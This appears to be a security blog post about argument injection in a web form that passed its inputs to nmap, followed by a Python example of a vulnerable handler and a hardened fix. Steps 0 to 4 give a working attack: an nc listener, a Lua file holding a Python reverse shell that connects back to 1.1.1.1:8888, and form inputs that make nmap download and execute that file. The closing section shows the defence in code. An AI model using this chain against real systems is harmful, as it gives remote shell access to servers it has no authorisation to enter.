Interesting case with code execution in Nmap

A very long time ago there was an interesting case with a site for system administrators where you could check whether a port on a host was open (the form had two inputs: IP and port).

The first thing that came to my mind was to enter this as the IP:
127.0.0.1 -h
As a result, the site returned Nmap's help output, so the input was clearly being passed straight into an nmap command line. But many characters were filtered and it was not possible to bypass the filter. After many attempts, an interesting remote code execution vector was found that needs no filter bypass at all.

Nmap ships an NSE script named http-fetch that requests URLs from a web server and saves the responses to disk; a script argument (destination) even lets you choose the directory they are saved in. NSE scripts are written in Lua, and reading the Nmap documentation on how they work shows that a script can run commands through Lua's os.execute() function. So now we have all the parts of the puzzle: make the target's Nmap download a file we control, then make it load that file as a script.

0) Start a listener on port 8888 on your server:
nc -lvp 8888
Let's say your server's IP is 1.1.1.1.

1) Create an index.php file on your server with the following content. It is plain Lua with no <?php tag, so PHP will serve it verbatim:

os.execute("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"1.1.1.1\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'")

2) Start PHP's built-in web server in the directory that holds index.php:
php -S 0.0.0.0:8080

3) On the victim site, enter this instead of the IP:
1.1.1.1 -script http-fetch
and this instead of the port:
8080 -dd -script-args destination=/tmp

On the site's backend, something like this will run:
nmap 1.1.1.1 -script http-fetch -p 8080 -dd -script-args destination=/tmp

This makes http-fetch request / from 1.1.1.1:8080 and save the response, so /tmp/1.1.1.1/8080/index.html on the victim now contains the Lua payload from step 1.

4) Run the downloaded file as an NSE script by entering this instead of the port:
8080 -dd -script /tmp/1.1.1.1/8080/index.html
The -script option accepts a file path, and the os.execute() call sits at the top level of the file, so it runs as soon as Nmap loads the script, before any host or port rule is evaluated. The target does not even need to have a matching open port.

If everything is right, you will get a reverse shell connecting back to 1.1.1.1:8888.

Thus, it is not always necessary to bypass filters or chain a second command with characters like |, & or ;. When user input ends up as arguments of a program that can load and run code, injecting extra options into that program is enough: this is argument injection, and a metacharacter blocklist does nothing against it.
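The following is an added example, not code from the original post or from the vulnerable site (whose backend was never shown). It models a hypothetical handler of the kind described: a shell-metacharacter filter followed by string concatenation into an nmap command line. It shows how the post's two form inputs survive the filter and become separate nmap arguments, and beside it a hardened handler that validates each input as an IP address and a port number and invokes nmap as an argv list with no shell. The sample inputs are the post's own payloads, with 1.1.1.1 as the placeholder attacker address; the function names and the exact blocklist are assumptions.

```python
import ipaddress
import shlex
import subprocess

# Constructed sample inputs: the two values the post types into the form
# in steps 3 and 4 (1.1.1.1 is the post's placeholder for the attacker host).
INJECTED_HOST = "1.1.1.1 -script http-fetch"
INJECTED_PORT_FETCH = "8080 -dd -script-args destination=/tmp"
INJECTED_PORT_RUN = "8080 -dd -script /tmp/1.1.1.1/8080/index.html"

# An assumed metacharacter blocklist of the kind the post describes running into.
# It blocks command chaining but says nothing about argument injection.
SHELL_METACHARS = set("|&;`$<>(){}\n\r")


def vulnerable_command(host, port):
    """Hypothetical vulnerable handler: rejects shell metacharacters, then
    concatenates the raw inputs into a shell command string.

    It returns the string rather than running it so the example stays offline.
    """
    for value in (host, port):
        if SHELL_METACHARS & set(value):
            raise ValueError("forbidden character")
    # Spaces, dashes, slashes and '=' all pass the filter, so the payload survives.
    return "nmap %s -p %s" % (host, port)


def vulnerable_argv(host, port):
    """The argv that /bin/sh -c would hand to nmap for that string: the
    injected words become separate arguments, which nmap parses as options."""
    return shlex.split(vulnerable_command(host, port))


def hardened_argv(host, port):
    """Validate each input against what it is supposed to be, then re-serialise
    the parsed values into an argv list so no shell is involved and each input
    occupies exactly one argument."""
    addr = ipaddress.ip_address(host)      # ValueError unless host is an IP literal
    port_number = int(port)                # ValueError unless port is an integer
    if not 1 <= port_number <= 65535:
        raise ValueError("port out of range")
    return ["nmap", "-p", str(port_number), str(addr)]


def run_port_check(host, port, timeout=120):
    """How the hardened handler would invoke nmap: argv list, no shell.
    Not called by the example, so it runs without nmap installed."""
    return subprocess.run(hardened_argv(host, port), capture_output=True,
                          text=True, timeout=timeout, check=False).stdout


def rejects(builder, host, port):
    """True if builder raises ValueError for (host, port); used to show which
    handler stops which payload."""
    try:
        builder(host, port)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # The filter lets the post's payloads through and nmap sees them as options.
    print(vulnerable_argv(INJECTED_HOST, INJECTED_PORT_FETCH))
    print(rejects(vulnerable_command, "127.0.0.1; id", "80"),
          rejects(vulnerable_command, INJECTED_HOST, INJECTED_PORT_RUN))
    # Validation plus argv construction stops both of them.
    print(hardened_argv("1.1.1.1", "8080"),
          rejects(hardened_argv, INJECTED_HOST, "8080"),
          rejects(hardened_argv, "1.1.1.1", INJECTED_PORT_RUN))
```

The point of hardened_argv is that validation rejects anything that is not a single IP address or a single integer, and the parsed values, not the raw strings, are serialised back into exactly one argv element each. Even if a stray option string somehow reached nmap as one element it would be treated as a hostname to resolve, not as a flag list, because no shell ever re-splits it.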

Zeroday 😀
